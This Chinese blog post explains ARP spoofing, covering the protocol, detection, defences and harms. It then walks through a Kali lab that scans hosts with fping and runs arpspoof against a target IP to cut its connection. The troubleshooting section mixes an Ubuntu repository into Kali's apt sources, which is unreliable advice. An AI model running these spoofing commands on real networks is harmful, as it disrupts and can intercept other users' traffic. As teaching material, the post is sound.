侧边栏

ARP地址欺骗

ARP地址欺骗

Arp欺骗攻击

利用ARP协议的缺陷进行的一种非法攻击

ARP协议

地址解析协议,将IP地址转换为对应的mac地址,属链路层协议
数据包分为:

请求包(广播):本机IP地址、mac地址+目标主机IP地址

应答包(单播):本机IP地址、mac地址+来源主机IP地址、mac地址

通信方式:

主机A和主机B通信过程:

ARP欺骗攻击的检测与防御

检测:

1、网络频繁掉线

2、网速突然变慢

3、使用arp -a命令查看的网关mac地址与真实的网关mac地址不同

4、使用嗅探软件发现局域网内存在大量arp应答包

防御:

1、绑定mac地址

2、使用静态arp缓存表

3、使用arp服务器,通过服务器来查找arp转换表来响应其他机器的广播

4、使用arp欺骗防护软件

ARP欺骗的危害

1、使同一网段内其他用户无法上网

2、可以嗅探到交换式局域网中的所有数据包

3、对信息进行篡改

4、可以控制局域网内任何主机

ARP地址欺骗攻击过程

首先准备两台设备,一台:kail,作为攻击机。一台:靶机(笔记本电脑)

场景:两台设备需要在同一个局域网下,网关相同;

第一步:

查看靶机和攻击机的IP地址:

靶机:ipconfig

攻击机:ifconfig

 第二步:查看相同网段下存活的主机

(如果不知道对方主机IP地址,可以观察存活主机来判断对方主机的ip地址)

fping -g 192.168.199.0/24

第三步:发起攻击

首先在靶机查看是否联网

ping www.baidu.com

 然后在攻击机上发起攻击

arpspoof -i eth0 -t  192.168.199.61 192.168.199.1

看到靶机无法上网

然后再到攻击机上停止攻击

(Ctrl + Z)

发现靶机恢复正常

找不到命令解决

第一步换源

进入 cd /etc/apt
更换两个源地址

deb http://archive.ubuntu.com/ubuntu/ trusty main universe restricted multiverse
deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib

第二步安装

输入arpspoof发现没有安装,现在开始安装

apt-get install dsniff

这时候报错提示E:有为满足的依赖关系,请尝试不指明软件包的名字.......等等

未安装成功得原因是有相应的依赖包,这时候可根据提示输入

apt --fix-broken install

等待安装跑完输入

apt-get install dsniff ssldump

第三步检测

这时输入arpspoof发现可以出现安装版本,证明已经安装成功

输入apt-get install dsniff,安装完成后就可用进行arp欺骗,使局域网用户断网

posted @ 2021-03-18 15:54  菜鸟-传奇  阅读(1445)  评论(0编辑  收藏  举报